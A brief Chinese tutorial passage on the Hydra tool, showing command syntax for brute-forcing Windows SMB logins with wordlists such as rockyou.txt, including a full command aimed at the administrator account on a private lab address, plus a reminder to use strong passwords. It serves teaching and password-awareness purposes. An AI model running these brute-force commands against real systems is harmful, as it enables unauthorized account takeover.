接下来看一下Hydra工具,这是一个暴力破解密码的工具。
使用命令(注意区分大小写)。
hydra -L user.txt账号字典 -P pass.txt密码字典 IP地址 smb协议名称
hydra -l administrator指定账号 -P pass.txt密码字典 IP地址 smb协议名称
hydra -l administrator指定账号 -p 123456指定密码 IP地址 smb协议名称
对于密码字典,kali中进行了内置。
查看一个常用的密码字典rockyou.txt,共有1400多万个密码。我随便查找了一个,比如192171,发现还真有。所以,各位设置密码的时候,要尽可能复杂一些,以防破解。
下面使用密码字典来破解,具体可参考文章:
Hydra(九头蛇)密码破解工具的详细使用教程_hydra软件-CSDN博客
命令为:
hydra -l administrator -P rockyou.txt 192.168.42.168 smb -V
(必须在密码字典的路径中才能运行,否则需要写上全路径
/usr/share/wordlists/rockyou.txt,-V是显示详情【运行情况】,administrator是每台windows系统都有的账号【所以用小写的l直接指定账号】)
